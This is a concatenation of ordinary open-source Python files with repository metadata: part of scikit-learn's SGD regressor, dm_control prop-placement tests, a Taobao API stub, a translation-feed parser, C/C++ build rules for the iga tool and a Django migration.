alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol,
shuffle=shuffle,
verbose=verbose,
epsilon=epsilon,
random_state=random_state,
learning_rate=learning_rate,
eta0=eta0, power_t=power_t,
warm_start=warm_start,
average=average,
n_iter=n_iter)
def _partial_fit(self, X, y, alpha, C, loss, learning_rate,
max_iter, sample_weight, coef_init, intercept_init):
X, y = check_X_y(X, y, "csr", copy=False, order='C', dtype=np.float64)
y = y.astype(np.float64, copy=False)
n_samples, n_features = X.shape
# Allocate datastructures from input arguments
sample_weight = self._validate_sample_weight(sample_weight, n_samples)
if getattr(self, "coef_", None) is None:
self._allocate_parameter_mem(1, n_features,
coef_init, intercept_init)
elif n_features != self.coef_.shape[-1]:
raise ValueError("Number of features %d does not match previous "
"data %d." % (n_features, self.coef_.shape[-1]))
if self.average > 0 and getattr(self, "average_coef_", None) is None:
self.average_coef_ = np.zeros(n_features,
dtype=np.float64,
order="C")
self.average_intercept_ = np.zeros(1,
dtype=np.float64,
order="C")
self._fit_regressor(X, y, alpha, C, loss, learning_rate,
sample_weight, max_iter)
return self
def partial_fit(self, X, y, sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Subset of training data
y : numpy array of shape (n_samples,)
Subset of target values
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples.
If not provided, uniform weights are assumed.
Returns
-------
self : returns an instance of self.
"""
self._validate_params()
return self._partial_fit(X, y, self.alpha, C=1.0,
loss=self.loss,
learning_rate=self.learning_rate, max_iter=1,
sample_weight=sample_weight, coef_init=None,
intercept_init=None)
def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
intercept_init=None, sample_weight=None):
self._validate_params()
if self.warm_start and getattr(self, "coef_", None) is not None:
if coef_init is None:
coef_init = self.coef_
if intercept_init is None:
intercept_init = self.intercept_
else:
self.coef_ = None
self.intercept_ = None
if self.average > 0:
self.standard_intercept_ = self.intercept_
self.standard_coef_ = self.coef_
self.average_coef_ = None
self.average_intercept_ = None
# Clear iteration count for multiple call to fit.
self.t_ = 1.0
self._partial_fit(X, y, alpha, C, loss, learning_rate,
self._max_iter, sample_weight, coef_init,
intercept_init)
if (self._tol is not None and self._tol > -np.inf
and self.n_iter_ == self._max_iter):
warnings.warn("Maximum number of iteration reached before "
"convergence. Consider increasing max_iter to "
"improve the fit.",
ConvergenceWarning)
return self
def fit(self, X, y, coef_init=None, intercept_init=None,
sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data
y : numpy array, shape (n_samples,)
Target values
coef_init : array, shape (n_features,)
The initial coefficients to warm-start the optimization.
intercept_init : array, shape (1,)
The initial intercept to warm-start the optimization.
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : returns an instance of self.
"""
return self._fit(X, y, alpha=self.alpha, C=1.0,
loss=self.loss, learning_rate=self.learning_rate,
coef_init=coef_init,
intercept_init=intercept_init,
sample_weight=sample_weight)
def _decision_function(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Returns
-------
array, shape (n_samples,)
Predicted target values per element in X.
"""
check_is_fitted(self, ["t_", "coef_", "intercept_"], all_or_any=all)
X = check_array(X, accept_sparse='csr')
scores = safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
return scores.ravel()
def predict(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Returns
-------
array, shape (n_samples,)
Predicted target values per element in X.
"""
return self._decision_function(X)
def _fit_regressor(self, X, y, alpha, C, loss, learning_rate,
sample_weight, max_iter):
dataset, intercept_decay = make_dataset(X, y, sample_weight)
loss_function = self._get_loss_function(loss)
penalty_type = self._get_penalty_type(self.penalty)
learning_rate_type = self._get_learning_rate_type(learning_rate)
if not hasattr(self, "t_"):
self.t_ = 1.0
random_state = check_random_state(self.random_state)
# numpy mtrand expects a C long which is a signed 32 bit integer under
# Windows
seed = random_state.randint(0, np.iinfo(np.int32).max)
tol = self._tol if self._tol is not None else -np.inf
if self.average > 0:
self.standard_coef_, self.standard_intercept_, \
self.average_coef_, self.average_intercept_, self.n_iter_ =\
average_sgd(self.standard_coef_,
self.standard_intercept_[0],
self.average_coef_,
self.average_intercept_[0],
loss_function,
penalty_type,
alpha, C,
self.l1_ratio,
dataset,
max_iter, tol,
int(self.fit_intercept),
int(self.verbose),
int(self.shuffle),
seed,
1.0, 1.0,
learning_rate_type,
self.eta0, self.power_t, self.t_,
intercept_decay, self.average)
self.average_intercept_ = np.atleast_1d(self.average_intercept_)
self.standard_intercept_ = np.atleast_1d(self.standard_intercept_)
self.t_ += self.n_iter_ * X.shape[0]
if self.average <= self.t_ - 1.0:
self.coef_ = self.average_coef_
self.intercept_ = self.average_intercept_
else:
self.coef_ = self.standard_coef_
self.intercept_ = self.standard_intercept_
else:
self.coef_, self.intercept_, self.n_iter_ = \
plain_sgd(self.coef_,
self.intercept_[0],
loss_function,
penalty_type,
alpha, C,
self.l1_ratio,
dataset,
max_iter, tol,
int(self.fit_intercept),
int(self.verbose),
int(self.shuffle),
seed,
1.0, 1.0,
learning_rate_type,
self.eta0, self.power_t, self.t_,
intercept_decay)
self.t_ += self.n_iter_ * X.shape[0]
self.intercept_ = np.atleast_1d(self.intercept_)
class SGDRegressor(BaseSGDRegressor):
"""Linear model fitted by minimizing a regularized empirical loss with SGD
SGD stands for Stochastic Gradient Descent: the gradient of the loss is
estimated each sample at a time and the model is updated along the way with
a decreasing strength schedule (aka learning rate).
The regularizer is a penalty added to the loss function that shrinks model
parameters towards the zero vector using either the squared euclidean norm
L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
parameter update crosses the 0.0 value because of the regularizer, the
update is truncated to 0.0 to allow for learning sparse models and achieve
online feature selection.
This implementation works with data represented as dense numpy arrays of
floating point values for the features.
Read more in the :ref:`User Guide <sgd>`.
Parameters
----------
loss : str, default: 'squared_loss'
The loss function to be used. The possible values are 'squared_loss',
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'
The 'squared_loss' refers to the ordinary least squares fit.
'huber' modifies 'squared_loss' to focus less on getting outliers
correct by switching from squared to linear loss past a distance of
epsilon. 'epsilon_insensitive' ignores errors less than epsilon and is
linear past that; this is the loss function used in SVR.
'squared_epsilon_insensitive' is the same but becomes squared loss past
a tolerance of epsilon.
penalty : str, 'none', 'l2', 'l1', or 'elasticnet'
The penalty (aka regularization term) to be used. Defaults to 'l2'
which is the standard regularizer for linear SVM models. 'l1' and
'elasticnet' might bring sparsity to the model (feature selection)
not achievable with 'l2'.
alpha : float
Constant that multiplies the regularization term. Defaults to 0.0001
Also used to compute learning_rate when set to 'optimal'.
l1_ratio : float
The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
Defaults to 0.15.
fit_intercept : bool
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered. Defaults to True.
max_iter : int, optional
The maximum number of passes over the training data (aka epochs).
It only impacts the behavior in the ``fit`` method, and not the
`partial_fit`.
Defaults to 5. Defaults to 1000 from 0.21, or if tol is not None.
.. versionadded:: 0.19
tol : float or None, optional
The stopping criterion. If it is not None, the iterations will stop
when (loss > previous_loss - tol). Defaults to None.
Defaults to 1e-3 from 0.21.
.. versionadded:: 0.19
shuffle : bool, optional
Whether or not the training data should be shuffled after each epoch.
Defaults to True.
verbose : integer, optional
The verbosity level.
epsilon : float
Epsilon in the epsilon-insensitive loss functions; only if `loss` is
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
For 'huber', determines the threshold at which it becomes less
important to get the prediction exactly right.
For epsilon-insensitive, any differences between the current prediction
and the correct label are ignored if they are less than this threshold.
random_state : int, RandomState instance or None, optional (default=None)
The seed of the pseudo random number generator to use when shuffling
the data. If int, random_state is the seed used by the random number
generator; If RandomState instance, random_state is the random number
generator; If None, the random number generator is the RandomState
instance used by `np.random`.
learning_rate : string, optional
The learning rate schedule:
- 'constant': eta = eta0
- 'optimal': eta = 1.0 / (alpha * (t + t0)) [default]
- 'invscaling': eta = eta0 / pow(t, power_t)
where t0 is chosen by a heuristic proposed by Leon Bottou.
eta0 : double, optional
The initial learning rate [default 0.01].
power_t : double, optional
The exponent for inverse scaling learning rate [default 0.25].
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
average : bool or int, optional
When set to True, computes the averaged SGD weights and stores the
result in the ``coef_`` attribute. If set to an int greater than 1,
averaging will begin once the total number of samples seen reaches
average. So ``average=10`` will begin averaging after seeing 10
samples.
n_iter : int, optional
The number of passes over the training data (aka epochs).
Defaults to None. Deprecated, will be removed in 0.21.
.. versionchanged:: 0.19
Deprecated
Attributes
----------
coef_ : array, shape (n_features,)
Weights assigned to the features.
intercept_ : array, shape (1,)
The intercept term.
average_coef_ : array, shape (n_features,)
Averaged weights assigned to the features.
average_intercept_ : array, shape (1,)
The averaged intercept term.
n_iter_ : int
The actual number of iterations to reach the stopping criterion.
Examples
--------
>>> import numpy as np
>>> from sklearn import linear_model
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = linear_model.SGDRegressor()
>>> clf.fit(X, y)
... #doctest: +NORMALIZE_WHITESPACE
SGDRegressor(alpha=0.0001, average=False, epsilon=0.1, eta0=0.01,
fit_intercept=True, l1_ratio=0.15, learning_rate='invscaling',
loss='squared_loss', max_iter=None, n_iter=None, penalty='l2',
power_t=0.25, random_state=None, shuffle=True, tol=None,
verbose=0, warm_start=False)
See also
--------
Ridge, ElasticNet, Lasso, SVR
"""
def __init__(self, loss="squared_loss", penalty="l2", alpha=0.0001,
l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
random_state=None, learning_rate="invscaling", eta0=0.01,
power_t=0.25, warm_start=False, average=False, n_iter=None):
super(SGDRegressor, self).__init__(loss=loss, penalty=penalty,
alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol,
shuffle=shuffle,
verbose=verbose,
epsilon=epsilon,
random_state=random_state,
learning_rate=learning_rate,
eta0=eta0, power_t=power_t,
warm_start=warm_start,
average=average, n_iter=n_iter)
| {
"content_hash": "e2525c7eb4e76d18e99387f5f0b0312f",
"timestamp": "",
"source": "github",
"line_count": 1340,
"max_line_length": 79,
"avg_line_length": 41.50820895522388,
"alnum_prop": 0.5563905719062944,
"repo_name": "clemkoa/scikit-learn",
"id": "68c2704860ec4063a13c4ab709982ca1ece08a19",
"size": "55771",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "sklearn/linear_model/stochastic_gradient.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "451996"
},
{
"name": "C++",
"bytes": "140322"
},
{
"name": "Makefile",
"bytes": "1512"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "7322224"
},
{
"name": "Shell",
"bytes": "20749"
}
],
"symlink_target": ""
} |
"""Tests for prop_initializer."""
from absl.testing import absltest
from absl.testing import parameterized
from dm_control import composer
from dm_control import mjcf
from dm_control.composer.initializers import prop_initializer
from dm_control.composer.variation import distributions
from dm_control.entities import props
import numpy as np
class _SequentialChoice(distributions.Distribution):
"""Helper class to return samples in order for deterministic testing."""
__slots__ = ()
def __init__(self, choices, single_sample=False):
super().__init__(choices, single_sample=single_sample)
self._idx = 0
def _callable(self, random_state):
def next_item(*args, **kwargs):
del args, kwargs # Unused.
result = self._args[0][self._idx]
self._idx = (self._idx + 1) % len(self._args[0])
return result
return next_item
def _make_spheres(num_spheres, radius, nconmax):
spheres = []
arena = composer.Arena()
arena.mjcf_model.worldbody.add('geom', type='plane', size=[1, 1, 0.1],
pos=[0., 0., -2 * radius], name='ground')
for i in range(num_spheres):
sphere = props.Primitive(
geom_type='sphere', size=[radius], name='sphere_{}'.format(i))
arena.add_free_entity(sphere)
spheres.append(sphere)
arena.mjcf_model.size.nconmax = nconmax
physics = mjcf.Physics.from_mjcf_model(arena.mjcf_model)
return physics, spheres
class PropPlacerTest(parameterized.TestCase):
"""Tests for PropPlacer."""
def assertNoContactsInvolvingEntities(self, physics, entities):
all_colliding_geoms = set()
for contact in physics.data.contact:
all_colliding_geoms.add(contact.geom1)
all_colliding_geoms.add(contact.geom2)
for entity in entities:
entity_geoms = physics.bind(entity.mjcf_model.find_all('geom')).element_id
colliding_entity_geoms = all_colliding_geoms.intersection(entity_geoms)
if colliding_entity_geoms:
names = ', '.join(
physics.model.id2name(i, 'geom') for i in colliding_entity_geoms)
self.fail('Entity {} has colliding geoms: {}'
.format(entity.mjcf_model.model, names))
def assertPositionsWithinBounds(self, physics, entities, lower, upper):
for entity in entities:
position, _ = entity.get_pose(physics)
if np.any(position < lower) or np.any(position > upper):
self.fail('Entity {} is out of bounds: position={}, bounds={}'
.format(entity.mjcf_model.model, position, (lower, upper)))
def test_sample_non_colliding_positions(self):
halfwidth = 0.05
radius = halfwidth / 4.
offset = np.array([0, 0, halfwidth + radius*1.1])
lower = -np.full(3, halfwidth) + offset
upper = np.full(3, halfwidth) + offset
position_variation = distributions.Uniform(lower, upper)
physics, spheres = _make_spheres(num_spheres=8, radius=radius, nconmax=1000)
prop_placer = prop_initializer.PropPlacer(
props=spheres,
position=position_variation,
ignore_collisions=False,
settle_physics=False)
prop_placer(physics, random_state=np.random.RandomState(0))
self.assertNoContactsInvolvingEntities(physics, spheres)
self.assertPositionsWithinBounds(physics, spheres, lower, upper)
def test_rejection_sampling_failure(self):
max_attempts_per_prop = 2
fixed_position = (0, 0, 0.1) # Guaranteed to always have collisions.
physics, spheres = _make_spheres(num_spheres=2, radius=0.01, nconmax=1000)
prop_placer = prop_initializer.PropPlacer(
props=spheres,
position=fixed_position,
ignore_collisions=False,
max_attempts_per_prop=max_attempts_per_prop)
expected_message = prop_initializer._REJECTION_SAMPLING_FAILED.format(
model_name=spheres[1].mjcf_model.model, # Props are placed in order.
max_attempts=max_attempts_per_prop)
with self.assertRaisesWithLiteralMatch(RuntimeError, expected_message):
prop_placer(physics, random_state=np.random.RandomState(0))
def test_ignore_contacts_with_entities(self):
physics, spheres = _make_spheres(num_spheres=2, radius=0.01, nconmax=1000)
# Target position of both spheres (non-colliding).
fixed_positions = [(0, 0, 0.1), (0, 0.1, 0.1)]
# Placer that initializes both spheres to (0, 0, 0.1), ignoring contacts.
prop_placer_init = prop_initializer.PropPlacer(
props=spheres,
position=fixed_positions[0],
ignore_collisions=True,
max_attempts_per_prop=1)
# Sequence of placers that will move the spheres to their target positions.
prop_placer_seq = []
for prop, target_position in zip(spheres, fixed_positions):
placer = prop_initializer.PropPlacer(
props=[prop],
position=target_position,
ignore_collisions=False,
max_attempts_per_prop=1)
prop_placer_seq.append(placer)
# We expect the first placer in the sequence to fail without
# `ignore_contacts_with_entities` because the second sphere is already at
# the same location.
prop_placer_init(physics, random_state=np.random.RandomState(0))
expected_message = prop_initializer._REJECTION_SAMPLING_FAILED.format(
model_name=spheres[0].mjcf_model.model, max_attempts=1)
with self.assertRaisesWithLiteralMatch(RuntimeError, expected_message):
prop_placer_seq[0](physics, random_state=np.random.RandomState(0))
# Placing the first sphere should succeed if we ignore contacts involving
# the second sphere.
prop_placer_init(physics, random_state=np.random.RandomState(0))
prop_placer_seq[0](physics, random_state=np.random.RandomState(0),
ignore_contacts_with_entities=[spheres[1]])
# Now place the second sphere with all collisions active.
prop_placer_seq[1](physics, random_state=np.random.RandomState(0),
ignore_contacts_with_entities=None)
self.assertNoContactsInvolvingEntities(physics, spheres)
@parameterized.parameters([False, True])
def test_settle_physics(self, settle_physics):
radius = 0.1
physics, spheres = _make_spheres(num_spheres=2, radius=radius, nconmax=1)
# Only place the first sphere.
prop_placer = prop_initializer.PropPlacer(
props=spheres[:1],
position=np.array([2.01 * radius, 0., 0.]),
settle_physics=settle_physics)
prop_placer(physics, random_state=np.random.RandomState(0))
first_position, first_quaternion = spheres[0].get_pose(physics)
del first_quaternion # Unused.
# If we allowed the physics to settle then the first sphere should be
# resting on the ground, otherwise it should be at the target height.
expected_first_z_pos = -radius if settle_physics else 0.
self.assertAlmostEqual(first_position[2], expected_first_z_pos, places=3)
second_position, second_quaternion = spheres[1].get_pose(physics)
del second_quaternion # Unused.
# The sphere that we were not placing should not have moved.
self.assertEqual(second_position[2], 0.)
@parameterized.parameters([0, 1, 2, 3])
def test_settle_physics_multiple_attempts(self, max_settle_physics_attempts):
# Tests the multiple-reset mechanism for `settle_physics`.
# Rather than testing the mechanic itself, which is tested above, we instead
# test that the mechanism correctly makes several attempts when it fails
# to settle. We force it to fail by making the settling time short, and
# test that the position is repeatedly called using a deterministic
# sequential pose distribution.
radius = 0.1
physics, spheres = _make_spheres(num_spheres=1, radius=radius, nconmax=1)
# Generate sequence of positions that will be sampled in order.
positions = [
np.array([2.01 * radius, 1., 0.]),
np.array([2.01 * radius, 2., 0.]),
np.array([2.01 * radius, 3., 0.]),
]
positions_dist = _SequentialChoice(positions)
def build_placer():
return prop_initializer.PropPlacer(
props=spheres[:1],
position=positions_dist,
settle_physics=True,
max_settle_physics_time=1e-6, # To ensure that settling FAILS.
max_settle_physics_attempts=max_settle_physics_attempts)
if max_settle_physics_attempts == 0:
with self.assertRaises(ValueError):
build_placer()
else:
prop_placer = build_placer()
prop_placer(physics, random_state=np.random.RandomState(0))
first_position, first_quaternion = spheres[0].get_pose(physics)
del first_quaternion # Unused.
# If we allowed the physics to settle then the first sphere should be
# resting on the ground, otherwise it should be at the target height.
expected_first_y_pos = max_settle_physics_attempts
self.assertAlmostEqual(first_position[1], expected_first_y_pos, places=3)
if __name__ == '__main__':
absltest.main()
| {
"content_hash": "60688cfd8c7f1d6173426153a0bd4130",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 80,
"avg_line_length": 41.3287037037037,
"alnum_prop": 0.6845524812366977,
"repo_name": "deepmind/dm_control",
"id": "ac4acc09fcee5acf588496eec7010510dc31842e",
"size": "9594",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "dm_control/composer/initializers/prop_initializer_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "136624"
},
{
"name": "Python",
"bytes": "2097331"
}
],
"symlink_target": ""
} |
'''
Created by auto_sdk on 2014.11.07
'''
from top.api.base import RestApi
class TmallBrandcatControlGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
def getapiname(self):
return 'tmall.brandcat.control.get'
| {
"content_hash": "4c3e435b06abd754ec34383fbc915c0f",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 55,
"avg_line_length": 28.8,
"alnum_prop": 0.7048611111111112,
"repo_name": "colaftc/webtool",
"id": "03f96cff948ad99caad7f1440a695869c7ed1e91",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "top/api/rest/TmallBrandcatControlGetRequest.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12208"
},
{
"name": "HTML",
"bytes": "16773"
},
{
"name": "JavaScript",
"bytes": "2571"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "258023"
},
{
"name": "Ruby",
"bytes": "861"
},
{
"name": "VimL",
"bytes": "401921"
}
],
"symlink_target": ""
} |
def extractDmtranslationscnWordpressCom(item):
'''
Parser for 'dmtranslationscn.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('TSLDB', 'The Strongest Legend of Dragon Ball', 'translated'),
('OPTS', 'One Piece Talent System', 'translated'),
('GGS', 'Galactic Garbage Station', 'translated'),
('HOM', 'Heroes of Marvel', 'translated'),
('ephs', 'Endless Plunder In High School DxD', 'translated'),
('optm', 'One Piece – Thundergod Marine', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
if item['tags'] != ['Uncategorized']:
return False
titlemap = [
('Time Traveler V', 'Time Traveler', 'translated'),
]
for titlecomponent, name, tl_type in titlemap:
if titlecomponent.lower() in item['title'].lower():
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | {
"content_hash": "7e72c26e9226c1bfbaa73d10d12ca9b1",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 104,
"avg_line_length": 37,
"alnum_prop": 0.5726807888970051,
"repo_name": "fake-name/ReadableWebProxy",
"id": "b96edb52e79b43edd3c89534ddbed69cab76e14b",
"size": "1371",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "WebMirror/management/rss_parser_funcs/feed_parse_extractDmtranslationscnWordpressCom.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "105811"
},
{
"name": "Dockerfile",
"bytes": "1178"
},
{
"name": "HTML",
"bytes": "119737"
},
{
"name": "JavaScript",
"bytes": "3006524"
},
{
"name": "Jupyter Notebook",
"bytes": "148075"
},
{
"name": "Mako",
"bytes": "1454"
},
{
"name": "Python",
"bytes": "5264346"
},
{
"name": "Shell",
"bytes": "1059"
}
],
"symlink_target": ""
} |
"""Build rules for C/C++."""
__all__ = [
'init',
]
import itertools
import iga.filetype
from iga.core import ImmutableOrderedSet
from iga.core import group
from iga.core import traverse
from iga.fargparse import oneof
from iga.label import Label
from iga.ninja import NinjaBuildstmt
from iga.ninja import NinjaRule
from iga.path import Glob
from iga.rule import Rule
from iga.rule import RuleData
from iga.rule import RuleFunc
from iga.rule import RuleType
CC_SOURCE = 'cc_source'
CC_HEADER = 'cc_header'
CC_OBJECT = 'cc_object'
CC_LIBRARY = 'cc_library'
CC_BINARY = 'cc_binary'
CC_SUFFIXES = {
CC_LIBRARY: {'.a'},
CC_SOURCE: {'.c', '.cc', '.cpp', '.cxx', '.C'},
CC_HEADER: {'.h', '.hh', '.hpp', '.hxx', '.inc'},
}
def init():
"""Init C/C++ build rules."""
NinjaRule.register(NinjaRule.make(
name=CC_OBJECT,
command='$cxx -MMD -MT $out -MF $out.d $cflags -c $in -o $out',
description='CXX $out',
depfile='$out.d',
deps='gcc',
))
NinjaRule.register(NinjaRule.make(
name=CC_LIBRARY,
command='rm -f $out && $ar crs $out $in',
description='AR $out',
))
NinjaRule.register(NinjaRule.make(
name=CC_BINARY,
command='$cxx $ldflags -o $out $in $libs',
description='LINK $out',
))
for input_type, suffixes in CC_SUFFIXES.items():
for suffix in suffixes:
iga.filetype.add_suffix(input_type, suffix)
RuleType.register(RuleType.make(
name=CC_LIBRARY,
input_types=[CC_LIBRARY, CC_SOURCE, CC_HEADER],
output_types=[CC_LIBRARY, CC_OBJECT],
make_outputs=make_outputs,
ninja_rules=[CC_OBJECT, CC_LIBRARY],
generate_buildstmts=generate_library,
))
RuleType.register(RuleType.make(
name=CC_BINARY,
input_types=[CC_LIBRARY, CC_SOURCE, CC_HEADER],
output_types=[CC_BINARY, CC_OBJECT],
make_outputs=make_outputs,
ninja_rules=[CC_OBJECT, CC_BINARY],
generate_buildstmts=generate_binary,
))
RuleFunc.register(RuleFunc.make(cc_library))
RuleFunc.register(RuleFunc.make(cc_binary))
def make_outputs(inputs):
return {
CC_OBJECT: [
src.with_suffix('.o') for src in inputs[CC_SOURCE]
],
}
def cc_library(
name: Label,
srcs: [oneof(Label, Glob)]=(),
deps: [Label]=()):
srcs = group(srcs, key=type, as_dict=False)
inputs = group(srcs[Label], key=iga.filetype.get, as_dict=False)
inputs[CC_LIBRARY] += deps
return RuleData.make(
rule_type=CC_LIBRARY,
name=name,
inputs=inputs,
input_patterns=srcs[Glob],
outputs={CC_LIBRARY: [name.with_name(_lib(name.name))]},
)
def cc_binary(
name: Label,
srcs: [oneof(Label, Glob)]=(),
deps: [Label]=()):
srcs = group(srcs, key=type, as_dict=False)
inputs = group(srcs[Label], key=iga.filetype.get, as_dict=False)
inputs[CC_LIBRARY] += deps
return RuleData.make(
rule_type=CC_BINARY,
name=name,
inputs=inputs,
input_patterns=srcs[Glob],
outputs={CC_BINARY: [name]},
)
def generate_objects(rule):
headers = rule.inputs[CC_HEADER]
for src in rule.inputs[CC_SOURCE]:
yield NinjaBuildstmt.make(
ninja_rule=CC_OBJECT,
outputs=[src.with_suffix('.o')],
explicit_deps=[src],
implicit_deps=headers,
)
def generate_library(rule):
yield from generate_objects(rule)
yield NinjaBuildstmt.make(
ninja_rule=CC_LIBRARY,
outputs=rule.outputs[CC_LIBRARY],
explicit_deps=rule.outputs[CC_OBJECT],
)
def generate_binary(rule):
yield from generate_objects(rule)
# Retrieve the transitive closure of dependent CC_LIBRARY rules.
deps = list(map(
Rule.get_object,
ImmutableOrderedSet(itertools.chain.from_iterable(
traverse(label, _get_labels) for label in rule.inputs[CC_LIBRARY]
))
))
outputs = [label for dep in deps for label in dep.outputs[CC_LIBRARY]]
ldflags = ' '.join('-L%s' % label.path.parent for label in outputs)
libs = ' '.join('-l%s' % _unlib(label.name) for label in outputs)
yield NinjaBuildstmt.make(
ninja_rule=CC_BINARY,
outputs=rule.outputs[CC_BINARY],
explicit_deps=rule.outputs[CC_OBJECT],
implicit_deps=outputs,
variables={
'ldflags': '$ldflags ' + ldflags,
'libs': libs,
},
)
def _get_labels(label):
rule = Rule.get_object(label)
return [Rule.get_object(label).name for label in rule.inputs[CC_LIBRARY]]
def _lib(name):
return 'lib%s.a' % name
def _unlib(name):
"""Inverse of _lib()."""
assert name.startswith('lib') and name.endswith('.a')
return name[3:-2]
| {
"content_hash": "e5b465039acfd05342fbedfdacb84800",
"timestamp": "",
"source": "github",
"line_count": 179,
"max_line_length": 77,
"avg_line_length": 27.083798882681563,
"alnum_prop": 0.6062293729372937,
"repo_name": "clchiou/iga",
"id": "abef55247b3955119a2e4b790690f57ea62c4ee6",
"size": "4848",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "iga/rules/cc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "160"
},
{
"name": "C++",
"bytes": "86"
},
{
"name": "Python",
"bytes": "57726"
},
{
"name": "Shell",
"bytes": "155"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0042_auto_20150516_0737'),
]
operations = [
migrations.RenameField(
model_name='loanaccount',
old_name='state',
new_name='status',
),
migrations.AddField(
model_name='loanaccount',
name='loss_reserve_category',
field=models.IntegerField(default=1, choices=[(1, b'Good Loan'), (2, b'Doubtful (Past Due)'), (3, b'Written-down'), (4, b'Charged-off')]),
),
migrations.AlterField(
model_name='member',
name='role',
field=models.IntegerField(default=7, choices=[(0, b'Finance Committee'), (1, b'Audit and Supervision Committee'), (2, b'General Manager/CEO'), (3, b'Accountant'), (4, b'Cashier'), (5, b"Accountant's Assistant"), (6, b'Member')]),
),
migrations.AlterField(
model_name='memberprofile',
name='surname',
field=models.CharField(max_length=30, null=True, verbose_name=b'Surname', blank=True),
),
]
| {
"content_hash": "fd4ab18c25158daef2174c5ef096c9ca",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 241,
"avg_line_length": 35.93939393939394,
"alnum_prop": 0.5733558178752108,
"repo_name": "AjabWorld/ajabsacco",
"id": "0c9f4736f3e5cc6f0269fd24bffad5a5d830837c",
"size": "1210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ajabsacco/core/migrations/0043_auto_20150516_2246.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "125805"
},
{
"name": "HTML",
"bytes": "145914"
},
{
"name": "JavaScript",
"bytes": "37295"
},
{
"name": "Python",
"bytes": "335561"
},
{
"name": "Ruby",
"bytes": "2169"
},
{
"name": "Shell",
"bytes": "1331"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.